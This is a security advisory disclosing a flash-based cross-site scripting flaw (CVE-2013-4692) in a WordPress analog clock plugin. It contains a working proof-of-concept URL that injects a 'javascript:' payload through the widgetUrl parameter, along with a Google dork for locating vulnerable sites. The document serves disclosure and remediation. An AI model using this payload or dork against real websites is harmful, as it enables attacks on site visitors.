Xorbin Analog Flash Clock 1.0 For WordPress XSS

`====================================================================  
Xorbin Analog Flash Clock 1.0 Plugin for Wordpress Flash-based XSS  
====================================================================  
  
Description: This plugin displays analog flash clock on your website. It's easy to use and it's highly customizable. You can add analog flash clock to your website as a widget and use as many clocks as you like on one page  
  
Published: 30-06-2013  
Version : 1.0  
Severity : Low to Moderate  
CVSS Score: 5  
CVE: 2013-4692  
Authors : Prakhar Prasad http://www.prakharprasad.com  
Rafay Baloch http://www.rafayhackingarticles.net  
Download : http://wordpress.org/plugins/xorbin-analog-flash-clock/  
Vendor : XORBin http://www.xorbin.com/  
Google Dork: inurl:xorbin-analog-flash-clock  
  
Details:  
  
The vulnerability exists in "xorAnalogClock.swf" file of this plugin, "widgetUrl" and "urlWindow" parameter is taken   
from external input and is passed first into URLRequest() and then to navigateToURL() function.  
  
Pseudocode: navigateToURL(new URLRequest(_root.widgetUrl), _root.urlWindow);  
  
  
Proof-of-Concept:  
  
http://domain.tld/wordpress/wp-content/plugins/xorbin-analog-flash-clock/media/xorAnalogClock.swf#?urlWindow=_self&widgetUrl=javascript:alert(1);  
  
Clicking on clock will execute the Javascript payload.  
  
  
Solution:   
  
Similar method can be applied as described here - https://code.google.com/p/doctype-mirror/wiki/ArticleFlashSecurityGetURL  
  
`